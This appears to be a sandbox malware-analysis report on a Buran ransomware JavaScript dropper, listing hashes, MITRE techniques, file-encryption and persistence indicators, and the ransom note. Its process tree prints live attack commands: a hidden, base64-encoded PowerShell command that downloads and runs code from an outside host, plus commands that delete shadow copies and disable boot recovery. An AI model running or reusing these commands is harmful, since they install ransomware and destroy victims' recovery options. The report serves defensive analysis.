buran | 70ec3d6d6a6978bd21bd40b4e3e3a569d48b05fac0a7a8765753704d4197bfa2

Analysis

max time kernel
136s
max time network
151s
platform
windows10_x64
resource
win10v20210408
submitted
31-08-2021 16:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9403.js
Size

345KB
MD5

eea189749c6dcf6c8c04205ab60bb53c
SHA1

62ddf57299772f737a0ed6b5cc128e6357eea2c8
SHA256

70ec3d6d6a6978bd21bd40b4e3e3a569d48b05fac0a7a8765753704d4197bfa2
SHA512

f0c4f1e2ab43eb984f84abcf36075976f2f2be8e4e87f24c821ddfa076638a7271bb6278f8857bb18113034a6bb89fcf2a2a1c3e3b6b6a39b9536facee985d4e

Score

10^/10

buran persistence ransomware

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://jolantagraban.pl/log/57843441668980/dll/assistant.php

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note

!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. To be sure we have the decryptor and it works you can send an email: [email protected] and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? Write to email: [email protected] Reserved email: [email protected] Reserved email: [email protected] Your personal ID: 49A-B0B-A4F Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Emails

[email protected]

Signatures

Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
ransomware buran
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow	pid	Process
13	1516	powershell.exe

Executes dropped EXE 3 IoCs

Processes:

lSnGJo.execsrss.execsrss.exe

pid	Process
3392	lSnGJo.exe
2580	csrss.exe
2308	csrss.exe

Modifies extensions of user files 2 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

csrss.exe

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\MergeUnregister.tiff	csrss.exe
File opened for modification	C:\Users\Admin\Pictures\CompleteDisconnect.tiff	csrss.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

lSnGJo.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run	lSnGJo.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\csrss.exe\" -start"	lSnGJo.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

csrss.exe

description	ioc	Process
File opened (read-only)	\??\O:	csrss.exe
File opened (read-only)	\??\M:	csrss.exe
File opened (read-only)	\??\K:	csrss.exe
File opened (read-only)	\??\I:	csrss.exe
File opened (read-only)	\??\H:	csrss.exe
File opened (read-only)	\??\Z:	csrss.exe
File opened (read-only)	\??\W:	csrss.exe
File opened (read-only)	\??\V:	csrss.exe
File opened (read-only)	\??\U:	csrss.exe
File opened (read-only)	\??\S:	csrss.exe
File opened (read-only)	\??\P:	csrss.exe
File opened (read-only)	\??\N:	csrss.exe
File opened (read-only)	\??\L:	csrss.exe
File opened (read-only)	\??\B:	csrss.exe
File opened (read-only)	\??\Y:	csrss.exe
File opened (read-only)	\??\X:	csrss.exe
File opened (read-only)	\??\T:	csrss.exe
File opened (read-only)	\??\R:	csrss.exe
File opened (read-only)	\??\Q:	csrss.exe
File opened (read-only)	\??\J:	csrss.exe
File opened (read-only)	\??\G:	csrss.exe
File opened (read-only)	\??\F:	csrss.exe
File opened (read-only)	\??\E:	csrss.exe
File opened (read-only)	\??\A:	csrss.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
14	geoiptool.com

Drops file in Program Files directory 64 IoCs

Processes:

csrss.exe

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf	csrss.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\TimerWideTile.contrast-white_scale-125.png	csrss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNotePageWideTile.scale-200.png	csrss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Car\RTL\contrast-white\MedTile.scale-200.png	csrss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\pmd.cer.kd8eby0.49A-B0B-A4F	csrss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Dark.pdf.kd8eby0.49A-B0B-A4F	csrss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\pt-br\ui-strings.js	csrss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionGroupMedTile.scale-125.png	csrss.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-cn\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	csrss.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	csrss.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-text.xml.kd8eby0.49A-B0B-A4F	csrss.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubLargeTile.scale-200_contrast-white.png	csrss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\4642_20x20x32.png	csrss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_duplicate_18.svg	csrss.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hu-hu\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	csrss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\nub.png.kd8eby0.49A-B0B-A4F	csrss.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\6478_48x48x32.png	csrss.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_pt_BR.properties	csrss.exe
File opened for modification	C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml.kd8eby0.49A-B0B-A4F	csrss.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	csrss.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\vlc.mo.kd8eby0.49A-B0B-A4F	csrss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\10909_36x36x32.png	csrss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-black_targetsize-96.png	csrss.exe
File created	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\fonts\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	csrss.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	csrss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\icons_ie8.gif.kd8eby0.49A-B0B-A4F	csrss.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423496939244.profile.gz.kd8eby0.49A-B0B-A4F	csrss.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata_5.5.0.165303.jar.kd8eby0.49A-B0B-A4F	csrss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription2-ppd.xrm-ms	csrss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]	csrss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\graph.ico.kd8eby0.49A-B0B-A4F	csrss.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AlarmsSplashScreen.contrast-black_scale-125.png	csrss.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_ja.jar.kd8eby0.49A-B0B-A4F	csrss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSIPC\gl\msipc.dll.mui	csrss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\REFINED\THMBNAIL.PNG	csrss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vreg\osm.x-none.msi.16.x-none.vreg.dat	csrss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemeCreation\themes_page_menu_button.jpg	csrss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\example_icons.png	csrss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\cs-cz\ui-strings.js.kd8eby0.49A-B0B-A4F	csrss.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nl-nl\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	csrss.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-core-output2.xml.kd8eby0.49A-B0B-A4F	csrss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial4-pl.xrm-ms.kd8eby0.49A-B0B-A4F	csrss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Templates\1033\Training.potx.kd8eby0.49A-B0B-A4F	csrss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vreg\proof.fr-fr.msi.16.fr-fr.vreg.dat.kd8eby0.49A-B0B-A4F	csrss.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa.kd8eby0.49A-B0B-A4F	csrss.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\5613_24x24x32.png	csrss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\ended_review_or_form.gif	csrss.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\.data\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	csrss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSIPC\lv\msipc.dll.mui.kd8eby0.49A-B0B-A4F	csrss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000049\manifest.xml	csrss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-60_altform-unplated_contrast-black.png	csrss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\sv_get.svg.kd8eby0.49A-B0B-A4F	csrss.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\cmm\sRGB.pf.kd8eby0.49A-B0B-A4F	csrss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Arial.xml	csrss.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.xml	csrss.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\7336_40x40x32.png	csrss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\de-de\ui-strings.js.kd8eby0.49A-B0B-A4F	csrss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp6-pl.xrm-ms	csrss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.scale-100.png.kd8eby0.49A-B0B-A4F	csrss.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	csrss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-si\ui-strings.js.kd8eby0.49A-B0B-A4F	csrss.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler_1.2.0.v20140422-1847.jar	csrss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Retail-ul-phn.xrm-ms.kd8eby0.49A-B0B-A4F	csrss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSIPC\uk\msipc.dll.mui	csrss.exe

Drops file in Windows directory 1 IoCs

Processes:

csrss.exe

description	ioc	Process
File created	C:\Windows\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	csrss.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 2 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exe

pid	Process
3508	vssadmin.exe
2852	vssadmin.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

lSnGJo.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	lSnGJo.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	lSnGJo.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid	Process
1516	powershell.exe
1516	powershell.exe
1516	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exelSnGJo.exeWMIC.exeWMIC.exevssvc.exe

description	pid	Process
Token: SeDebugPrivilege	1516	powershell.exe
Token: SeDebugPrivilege	3392	lSnGJo.exe
Token: SeDebugPrivilege	3392	lSnGJo.exe
Token: SeIncreaseQuotaPrivilege	2620	WMIC.exe
Token: SeSecurityPrivilege	2620	WMIC.exe
Token: SeTakeOwnershipPrivilege	2620	WMIC.exe
Token: SeLoadDriverPrivilege	2620	WMIC.exe
Token: SeSystemProfilePrivilege	2620	WMIC.exe
Token: SeSystemtimePrivilege	2620	WMIC.exe
Token: SeProfSingleProcessPrivilege	2620	WMIC.exe
Token: SeIncBasePriorityPrivilege	2620	WMIC.exe
Token: SeCreatePagefilePrivilege	2620	WMIC.exe
Token: SeBackupPrivilege	2620	WMIC.exe
Token: SeRestorePrivilege	2620	WMIC.exe
Token: SeShutdownPrivilege	2620	WMIC.exe
Token: SeDebugPrivilege	2620	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2620	WMIC.exe
Token: SeRemoteShutdownPrivilege	2620	WMIC.exe
Token: SeUndockPrivilege	2620	WMIC.exe
Token: SeManageVolumePrivilege	2620	WMIC.exe
Token: 33	2620	WMIC.exe
Token: 34	2620	WMIC.exe
Token: 35	2620	WMIC.exe
Token: 36	2620	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2364	WMIC.exe
Token: SeSecurityPrivilege	2364	WMIC.exe
Token: SeTakeOwnershipPrivilege	2364	WMIC.exe
Token: SeLoadDriverPrivilege	2364	WMIC.exe
Token: SeSystemProfilePrivilege	2364	WMIC.exe
Token: SeSystemtimePrivilege	2364	WMIC.exe
Token: SeProfSingleProcessPrivilege	2364	WMIC.exe
Token: SeIncBasePriorityPrivilege	2364	WMIC.exe
Token: SeCreatePagefilePrivilege	2364	WMIC.exe
Token: SeBackupPrivilege	2364	WMIC.exe
Token: SeRestorePrivilege	2364	WMIC.exe
Token: SeShutdownPrivilege	2364	WMIC.exe
Token: SeDebugPrivilege	2364	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2364	WMIC.exe
Token: SeRemoteShutdownPrivilege	2364	WMIC.exe
Token: SeUndockPrivilege	2364	WMIC.exe
Token: SeManageVolumePrivilege	2364	WMIC.exe
Token: 33	2364	WMIC.exe
Token: 34	2364	WMIC.exe
Token: 35	2364	WMIC.exe
Token: 36	2364	WMIC.exe
Token: SeBackupPrivilege	2124	vssvc.exe
Token: SeRestorePrivilege	2124	vssvc.exe
Token: SeAuditPrivilege	2124	vssvc.exe
Token: SeIncreaseQuotaPrivilege	2364	WMIC.exe
Token: SeSecurityPrivilege	2364	WMIC.exe
Token: SeTakeOwnershipPrivilege	2364	WMIC.exe
Token: SeLoadDriverPrivilege	2364	WMIC.exe
Token: SeSystemProfilePrivilege	2364	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2620	WMIC.exe
Token: SeSystemtimePrivilege	2364	WMIC.exe
Token: SeSecurityPrivilege	2620	WMIC.exe
Token: SeProfSingleProcessPrivilege	2364	WMIC.exe
Token: SeTakeOwnershipPrivilege	2620	WMIC.exe
Token: SeIncBasePriorityPrivilege	2364	WMIC.exe
Token: SeLoadDriverPrivilege	2620	WMIC.exe
Token: SeCreatePagefilePrivilege	2364	WMIC.exe
Token: SeSystemProfilePrivilege	2620	WMIC.exe
Token: SeBackupPrivilege	2364	WMIC.exe
Token: SeSystemtimePrivilege	2620	WMIC.exe

Suspicious use of WriteProcessMemory 55 IoCs

Processes:

wscript.execmd.exepowershell.exelSnGJo.execsrss.execmd.execmd.execmd.exe

description	pid	Process	procid_target
PID 856 wrote to memory of 1664	856	wscript.exe	77
PID 856 wrote to memory of 1664	856	wscript.exe	77
PID 1664 wrote to memory of 1516	1664	cmd.exe	79
PID 1664 wrote to memory of 1516	1664	cmd.exe	79
PID 1516 wrote to memory of 3392	1516	powershell.exe	80
PID 1516 wrote to memory of 3392	1516	powershell.exe	80
PID 1516 wrote to memory of 3392	1516	powershell.exe	80
PID 3392 wrote to memory of 2580	3392	lSnGJo.exe	82
PID 3392 wrote to memory of 2580	3392	lSnGJo.exe	82
PID 3392 wrote to memory of 2580	3392	lSnGJo.exe	82
PID 3392 wrote to memory of 2260	3392	lSnGJo.exe	83
PID 3392 wrote to memory of 2260	3392	lSnGJo.exe	83
PID 3392 wrote to memory of 2260	3392	lSnGJo.exe	83
PID 3392 wrote to memory of 2260	3392	lSnGJo.exe	83
PID 3392 wrote to memory of 2260	3392	lSnGJo.exe	83
PID 3392 wrote to memory of 2260	3392	lSnGJo.exe	83
PID 2580 wrote to memory of 3308	2580	csrss.exe	84
PID 2580 wrote to memory of 3308	2580	csrss.exe	84
PID 2580 wrote to memory of 3308	2580	csrss.exe	84
PID 2580 wrote to memory of 3184	2580	csrss.exe	85
PID 2580 wrote to memory of 3184	2580	csrss.exe	85
PID 2580 wrote to memory of 3184	2580	csrss.exe	85
PID 2580 wrote to memory of 3612	2580	csrss.exe	86
PID 2580 wrote to memory of 3612	2580	csrss.exe	86
PID 2580 wrote to memory of 3612	2580	csrss.exe	86
PID 2580 wrote to memory of 2152	2580	csrss.exe	87
PID 2580 wrote to memory of 2152	2580	csrss.exe	87
PID 2580 wrote to memory of 2152	2580	csrss.exe	87
PID 2580 wrote to memory of 1416	2580	csrss.exe	88
PID 2580 wrote to memory of 1416	2580	csrss.exe	88
PID 2580 wrote to memory of 1416	2580	csrss.exe	88
PID 2580 wrote to memory of 764	2580	csrss.exe	92
PID 2580 wrote to memory of 764	2580	csrss.exe	92
PID 2580 wrote to memory of 764	2580	csrss.exe	92
PID 2580 wrote to memory of 2308	2580	csrss.exe	93
PID 2580 wrote to memory of 2308	2580	csrss.exe	93
PID 2580 wrote to memory of 2308	2580	csrss.exe	93
PID 3308 wrote to memory of 2620	3308	cmd.exe	98
PID 3308 wrote to memory of 2620	3308	cmd.exe	98
PID 3308 wrote to memory of 2620	3308	cmd.exe	98
PID 1416 wrote to memory of 2852	1416	cmd.exe	97
PID 1416 wrote to memory of 2852	1416	cmd.exe	97
PID 1416 wrote to memory of 2852	1416	cmd.exe	97
PID 764 wrote to memory of 2364	764	cmd.exe	100
PID 764 wrote to memory of 2364	764	cmd.exe	100
PID 764 wrote to memory of 2364	764	cmd.exe	100
PID 764 wrote to memory of 3508	764	cmd.exe	102
PID 764 wrote to memory of 3508	764	cmd.exe	102
PID 764 wrote to memory of 3508	764	cmd.exe	102
PID 2580 wrote to memory of 3876	2580	csrss.exe	104
PID 2580 wrote to memory of 3876	2580	csrss.exe	104
PID 2580 wrote to memory of 3876	2580	csrss.exe	104
PID 2580 wrote to memory of 3876	2580	csrss.exe	104
PID 2580 wrote to memory of 3876	2580	csrss.exe	104
PID 2580 wrote to memory of 3876	2580	csrss.exe	104

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\9403.js
1⤵
- Suspicious use of WriteProcessMemory
PID:856
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBqAG8AbABhAG4AdABhAGcAcgBhAGIAYQBuAC4AcABsAC8AbABvAGcALwA1ADcAOAA0ADMANAA0ADEANgA2ADgAOQA4ADAALwBkAGwAbAAvAGEAcwBzAGkAcwB0AGEAbgB0AC4AcABoAHAAIgApAA==
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1664
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBqAG8AbABhAG4AdABhAGcAcgBhAGIAYQBuAC4AcABsAC8AbABvAGcALwA1ADcAOAA0ADMANAA0ADEANgA2ADgAOQA4ADAALwBkAGwAbAAvAGEAcwBzAGkAcwB0AGEAbgB0AC4AcABoAHAAIgApAA==
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1516
  - - C:\Users\Admin\AppData\Local\Temp\lSnGJo.exe
      "C:\Users\Admin\AppData\Local\Temp\lSnGJo.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3392
    - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe" -start
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Suspicious use of WriteProcessMemory
        
        PID:2580
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3308
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2620
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
        6⤵
        
        PID:3184
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
        6⤵
        
        PID:3612
      - C:\Windows\SysWOW64\cmd.exe
        
